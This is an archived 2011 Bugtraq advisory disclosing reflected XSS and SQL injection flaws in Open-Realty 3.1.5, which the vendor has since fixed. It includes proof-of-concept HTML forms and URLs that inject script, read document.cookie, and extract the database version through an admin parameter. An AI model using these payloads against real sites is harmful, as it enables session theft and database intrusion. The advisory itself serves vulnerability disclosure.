lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 28 Jun 2011 18:13:54 +0200 (CEST)
From: advisory@...ridge.ch
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in Open-Realty


Vulnerability ID: HTB23023
Reference: http://www.htbridge.ch/advisory/multiple_vulnerabilities_in_open_realty.html
Product: Open-Realty
Vendor: Transparent Technologies, Inc. ( http://www.open-realty.org/ ) 
Vulnerable Version: 3.1.5 and probably prior
Tested on: 3.1.5
Vendor Notification: 07 June 2011 
Vulnerability Type: XSS (Cross Site Scripting), SQL Injection
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Open-Realty, which can be exploited to perform cross-site scripting and SQL Injection attacks.

1) Input passed via the "name", "email", "friend_email", "subject", "message" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:


<form action="http://[host]/index.php?action=contact_friend&popup=yes&listing_id=1" method="post">
<input type="hidden" name="name" value='"><script>alert(1);</script>'>
<input type="hidden" name="email" value='"><script>alert(2);</script>'>
<input type="hidden" name="friend_email" value='"><script>alert(3);</script>'>
<input type="hidden" name="subject" value='"><script>alert(4);</script>'>
<input type="hidden" name="message" value='</textarea><script>alert(5);</script>'>
<input type="hidden" name="submit" value='send'>
<input name="send" value="EXPLOIT" type="submit">
</form>


2) Input passed via the "searchtext" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/index.php?searchtext=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

3) Input passed via the "listing_id" GET parameter and "comments", "source" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:


<form action="http://[host]/index.php?action=contact_agent&listing_id=1<script>alert(1);</script> " method="post">
<input type="hidden" name="comments" value='<script>alert(2);</script>'>
<input type="hidden" name="formaction" value='create_new_lead'>
<input type="hidden" name="listingID" value='1'>
<input type="hidden" name="source" value='<script>alert(3);</script>'>
<input name="send" value="EXPLOIT" type="submit">
</form>


4) Input passed via the "path" GET parameter to /include/class/ckeditor/custom/filemanager/connectors/php/filemanager.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/include/class/ckeditor/custom/filemanager/connectors/php/filemanager.php?mode=getfolder&path=%3Cimg%20src=%221%22%20onerror=javascript:alert%28document.cookie%29;%3E

5) Input passed via the "type" GET parameter to /admin/index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/admin/index.php?action=edit_user_template&type=1%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

6) Input passed via the "query" POST parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:


<form action="http://[host]/index.php?action=save_search&printer_friendly= " method="post">
<input type="hidden" name="notify" value='no'>
<input type="hidden" name="title" value=''>
<input type="hidden" name="query" value='"><script>alert(document.cookie);</script>'>
<input name="send" value="EXPLOIT" type="submit">
</form>



7) Input passed via the "type" GET parameter to /admin/index.php is not properly sanitised before being used in SQL queries. 
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/admin/index.php?action=edit_user_template&type=min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@...B1%29%2%29%29%20--%202

Successful exploitation of this vulnerability requires permissions to access Admin Panel.

Solution: Upgrade to the most recent version



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ